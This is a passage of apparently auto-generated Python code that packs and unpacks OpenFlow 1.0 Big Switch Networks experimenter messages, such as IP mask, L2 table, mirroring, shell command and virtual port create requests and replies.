packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_pdu_tx_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 31)
obj.tx_interval_ms = reader.read("!L")[0]
obj.port_no = util.unpack_port_no(reader)
obj.slot_num = reader.read("!B")[0]
reader.skip(3)
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.tx_interval_ms != other.tx_interval_ms: return False
if self.port_no != other.port_no: return False
if self.slot_num != other.slot_num: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("bsn_pdu_tx_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("tx_interval_ms = ");
q.text("%#x" % self.tx_interval_ms)
q.text(","); q.breakable()
q.text("port_no = ");
q.text(util.pretty_port(self.port_no))
q.text(","); q.breakable()
q.text("slot_num = ");
q.text("%#x" % self.slot_num)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
bsn_header.subtypes[31] = bsn_pdu_tx_request
class bsn_set_ip_mask(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 0
def __init__(self, xid=None, index=None, mask=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if index != None:
self.index = index
else:
self.index = 0
if mask != None:
self.mask = mask
else:
self.mask = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!B", self.index))
packed.append('\x00' * 3)
packed.append(struct.pack("!L", self.mask))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_set_ip_mask()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 0)
obj.index = reader.read("!B")[0]
reader.skip(3)
obj.mask = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.index != other.index: return False
if self.mask != other.mask: return False
return True
def pretty_print(self, q):
q.text("bsn_set_ip_mask {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("index = ");
q.text("%#x" % self.index)
q.text(","); q.breakable()
q.text("mask = ");
q.text("%#x" % self.mask)
q.breakable()
q.text('}')
bsn_header.subtypes[0] = bsn_set_ip_mask
class bsn_set_l2_table_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 24
def __init__(self, xid=None, l2_table_enable=None, l2_table_priority=None, status=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if l2_table_enable != None:
self.l2_table_enable = l2_table_enable
else:
self.l2_table_enable = 0
if l2_table_priority != None:
self.l2_table_priority = l2_table_priority
else:
self.l2_table_priority = 0
if status != None:
self.status = status
else:
self.status = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!B", self.l2_table_enable))
packed.append('\x00' * 1)
packed.append(struct.pack("!H", self.l2_table_priority))
packed.append(struct.pack("!L", self.status))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_set_l2_table_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 24)
obj.l2_table_enable = reader.read("!B")[0]
reader.skip(1)
obj.l2_table_priority = reader.read("!H")[0]
obj.status = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.l2_table_enable != other.l2_table_enable: return False
if self.l2_table_priority != other.l2_table_priority: return False
if self.status != other.status: return False
return True
def pretty_print(self, q):
q.text("bsn_set_l2_table_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("l2_table_enable = ");
q.text("%#x" % self.l2_table_enable)
q.text(","); q.breakable()
q.text("l2_table_priority = ");
q.text("%#x" % self.l2_table_priority)
q.text(","); q.breakable()
q.text("status = ");
q.text("%#x" % self.status)
q.breakable()
q.text('}')
bsn_header.subtypes[24] = bsn_set_l2_table_reply
class bsn_set_l2_table_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 12
def __init__(self, xid=None, l2_table_enable=None, l2_table_priority=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if l2_table_enable != None:
self.l2_table_enable = l2_table_enable
else:
self.l2_table_enable = 0
if l2_table_priority != None:
self.l2_table_priority = l2_table_priority
else:
self.l2_table_priority = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!B", self.l2_table_enable))
packed.append('\x00' * 1)
packed.append(struct.pack("!H", self.l2_table_priority))
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_set_l2_table_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 12)
obj.l2_table_enable = reader.read("!B")[0]
reader.skip(1)
obj.l2_table_priority = reader.read("!H")[0]
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.l2_table_enable != other.l2_table_enable: return False
if self.l2_table_priority != other.l2_table_priority: return False
return True
def pretty_print(self, q):
q.text("bsn_set_l2_table_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("l2_table_enable = ");
q.text("%#x" % self.l2_table_enable)
q.text(","); q.breakable()
q.text("l2_table_priority = ");
q.text("%#x" % self.l2_table_priority)
q.breakable()
q.text('}')
bsn_header.subtypes[12] = bsn_set_l2_table_request
class bsn_set_mirroring(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 3
def __init__(self, xid=None, report_mirror_ports=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if report_mirror_ports != None:
self.report_mirror_ports = report_mirror_ports
else:
self.report_mirror_ports = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!B", self.report_mirror_ports))
packed.append('\x00' * 3)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_set_mirroring()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 3)
obj.report_mirror_ports = reader.read("!B")[0]
reader.skip(3)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.report_mirror_ports != other.report_mirror_ports: return False
return True
def pretty_print(self, q):
q.text("bsn_set_mirroring {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("report_mirror_ports = ");
q.text("%#x" % self.report_mirror_ports)
q.breakable()
q.text('}')
bsn_header.subtypes[3] = bsn_set_mirroring
class bsn_set_pktin_suppression_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 25
def __init__(self, xid=None, status=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if status != None:
self.status = status
else:
self.status = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.status))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_set_pktin_suppression_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 25)
obj.status = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.status != other.status: return False
return True
def pretty_print(self, q):
q.text("bsn_set_pktin_suppression_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("status = ");
q.text("%#x" % self.status)
q.breakable()
q.text('}')
bsn_header.subtypes[25] = bsn_set_pktin_suppression_reply
class bsn_set_pktin_suppression_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 11
def __init__(self, xid=None, enabled=None, idle_timeout=None, hard_timeout=None, priority=None, cookie=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if enabled != None:
self.enabled = enabled
else:
self.enabled = 0
if idle_timeout != None:
self.idle_timeout = idle_timeout
else:
self.idle_timeout = 0
if hard_timeout != None:
self.hard_timeout = hard_timeout
else:
self.hard_timeout = 0
if priority != None:
self.priority = priority
else:
self.priority = 0
if cookie != None:
self.cookie = cookie
else:
self.cookie = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!B", self.enabled))
packed.append('\x00' * 1)
packed.append(struct.pack("!H", self.idle_timeout))
packed.append(struct.pack("!H", self.hard_timeout))
packed.append(struct.pack("!H", self.priority))
packed.append(struct.pack("!Q", self.cookie))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_set_pktin_suppression_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 11)
obj.enabled = reader.read("!B")[0]
reader.skip(1)
obj.idle_timeout = reader.read("!H")[0]
obj.hard_timeout = reader.read("!H")[0]
obj.priority = reader.read("!H")[0]
obj.cookie = reader.read("!Q")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.enabled != other.enabled: return False
if self.idle_timeout != other.idle_timeout: return False
if self.hard_timeout != other.hard_timeout: return False
if self.priority != other.priority: return False
if self.cookie != other.cookie: return False
return True
def pretty_print(self, q):
q.text("bsn_set_pktin_suppression_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("enabled = ");
q.text("%#x" % self.enabled)
q.text(","); q.breakable()
q.text("idle_timeout = ");
q.text("%#x" % self.idle_timeout)
q.text(","); q.breakable()
q.text("hard_timeout = ");
q.text("%#x" % self.hard_timeout)
q.text(","); q.breakable()
q.text("priority = ");
q.text("%#x" % self.priority)
q.text(","); q.breakable()
q.text("cookie = ");
q.text("%#x" % self.cookie)
q.breakable()
q.text('}')
bsn_header.subtypes[11] = bsn_set_pktin_suppression_request
class bsn_shell_command(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 6
def __init__(self, xid=None, service=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if service != None:
self.service = service
else:
self.service = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.service))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_shell_command()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 6)
obj.service = reader.read("!L")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.service != other.service: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("bsn_shell_command {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("service = ");
q.text("%#x" % self.service)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
bsn_header.subtypes[6] = bsn_shell_command
class bsn_shell_output(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 7
def __init__(self, xid=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_shell_output()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 7)
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("bsn_shell_output {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
bsn_header.subtypes[7] = bsn_shell_output
class bsn_shell_status(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 8
def __init__(self, xid=None, status=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if status != None:
self.status = status
else:
self.status = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.status))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_shell_status()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 8)
obj.status = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.status != other.status: return False
return True
def pretty_print(self, q):
q.text("bsn_shell_status {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("status = ");
q.text("%#x" % self.status)
q.breakable()
q.text('}')
bsn_header.subtypes[8] = bsn_shell_status
class experimenter_stats_reply(stats_reply):
subtypes = {}
version = 1
type = 17
stats_type = 65535
def __init__(self, xid=None, flags=None, experimenter=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if experimenter != None:
self.experimenter = experimenter
else:
self.experimenter = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(struct.pack("!L", self.experimenter))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!L', 12)
subclass = experimenter_stats_reply.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = experimenter_stats_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 17)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 65535)
obj.flags = reader.read("!H")[0]
obj.experimenter = reader.read("!L")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.experimenter != other.experimenter: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("experimenter_stats_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
stats_reply.subtypes[65535] = experimenter_stats_reply
class bsn_stats_reply(experimenter_stats_reply):
subtypes = {}
version = 1
type = 19
stats_type = 65535
experimenter = 6035143
def __init__(self, xid=None, flags=None, subtype=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if subtype != None:
self.subtype = subtype
else:
self.subtype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append('\x00' * 4)
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!L', 20)
subclass = bsn_stats_reply.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = bsn_stats_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 19)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 65535)
obj.flags = reader.read("!H")[0]
reader.skip(4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
obj.subtype = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.subtype != other.subtype: return False
return True
def pretty_print(self, q):
q.text("bsn_stats_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.breakable()
q.text('}')
experimenter_stats_reply.subtypes[6035143] = bsn_stats_reply
class experimenter_stats_request(stats_request):
subtypes = {}
version = 1
type = 16
stats_type = 65535
def __init__(self, xid=None, flags=None, experimenter=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if experimenter != None:
self.experimenter = experimenter
else:
self.experimenter = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(struct.pack("!L", self.experimenter))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!L', 12)
subclass = experimenter_stats_request.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = experimenter_stats_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 16)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 65535)
obj.flags = reader.read("!H")[0]
obj.experimenter = reader.read("!L")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.experimenter != other.experimenter: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("experimenter_stats_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
stats_request.subtypes[65535] = experimenter_stats_request
class bsn_stats_request(experimenter_stats_request):
subtypes = {}
version = 1
type = 18
stats_type = 65535
experimenter = 6035143
def __init__(self, xid=None, flags=None, subtype=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if subtype != None:
self.subtype = subtype
else:
self.subtype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append('\x00' * 4)
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!L', 20)
subclass = bsn_stats_request.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = bsn_stats_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 18)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 65535)
obj.flags = reader.read("!H")[0]
reader.skip(4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
obj.subtype = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.subtype != other.subtype: return False
return True
def pretty_print(self, q):
q.text("bsn_stats_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.breakable()
q.text('}')
experimenter_stats_request.subtypes[6035143] = bsn_stats_request
class bsn_virtual_port_create_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 16
def __init__(self, xid=None, status=None, vport_no=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if status != None:
self.status = status
else:
self.status = 0
if vport_no != None:
self.vport_no = vport_no
else:
self.vport_no = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.status))
packed.append(struct.pack("!L", self.vport_no))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_virtual_port_create_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 16)
obj.status = reader.read("!L")[0]
obj.vport_no = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.status != other.status: return False
if self.vport_no != other.vport_no: return False
return True
def pretty_print(self, q):
q.text("bsn_virtual_port_create_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("status = ");
q.text("%#x" % self.status)
q.text(","); q.breakable()
q.text("vport_no = ");
q.text("%#x" % self.vport_no)
q.breakable()
q.text('}')
bsn_header.subtypes[16] = bsn_virtual_port_create_reply
class bsn_virtual_port_create_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 15
def __init__(self, xid=None, vport=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if vport != None:
self.vport = vport
else:
self.vport = ofp.bsn_vport()
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(self.vport.pack())
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_virtual_port_create_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 15)
obj.vport = ofp.bsn_vport.unpack(reader)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.vport != other.vport: return False
return True
def pretty_print(self, q):
q.text("bsn_virtual_port_create_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("vport = ");
q.pp(self.vport)
q.breakable()
q.text('}')
bsn_header.subtypes[15] = bsn_virtual_port_create_request
class bsn_virtual_port_remove_reply(bsn_header):
version = 1
type = 4
